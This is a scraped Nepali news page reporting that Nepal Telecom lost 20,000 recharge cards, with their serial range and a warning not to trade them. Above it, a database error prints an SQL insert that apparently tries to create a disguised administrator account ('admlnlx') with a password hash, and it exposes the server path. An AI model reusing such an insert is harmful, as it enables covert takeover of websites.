WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BAK.sZYILwE0XKrHBmU9lH8oeLfLYg/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 20:24:57', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
टेलिकमको २० लाखका रिचार्ज कार्ड हराए, खरिद बिक्री नगर्न अपील – Gaule Khabar

टेलिकमको २० लाखका रिचार्ज कार्ड हराए, खरिद बिक्री नगर्न अपील

टेलिकमको २० लाखका रिचार्ज कार्ड हराए, खरिद बिक्री नगर्न अपील

काठमाडौं, माघ १५ –

नेपाल टेलिकमको १ सय रुपैयाँ दरका २० हजार थान रिचार्ज कार्ड हराएका छन् । आयातका क्रममा २० हजार थन रिचार्ज कार्ड हराएको टेलिकमले जनाएको छ ।

टेलिकमले एक सूचना जारी गर्दै आफ्ना एनटी रिचार्ज कार्ड हराएको जनाएको छ । सिरियल नम्वर १११६१०००८१६००००१ देखि १११६१०००८१६२०००० सम्मको रिचार्ज कार्ड हराएको हो ।

यि सिरियल नम्बरका रिचार्ज कार्ड खरिद विक्री नगर्न टेलिकमले आह्वान गरेको छ । यसबाट ग्राहकबर्गमा समस्या पर्न सक्ने भएकाले टेलिकमले सचेत रहन भनेको छ ।

यि रिचार्ज कार्ड बजारमा आए भनेपनि प्रयोग गर्न सकिने छैन । त्यसैे रिचार्ज किन्दा अब सिरियल नम्बर हेर्नुपर्ने भएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका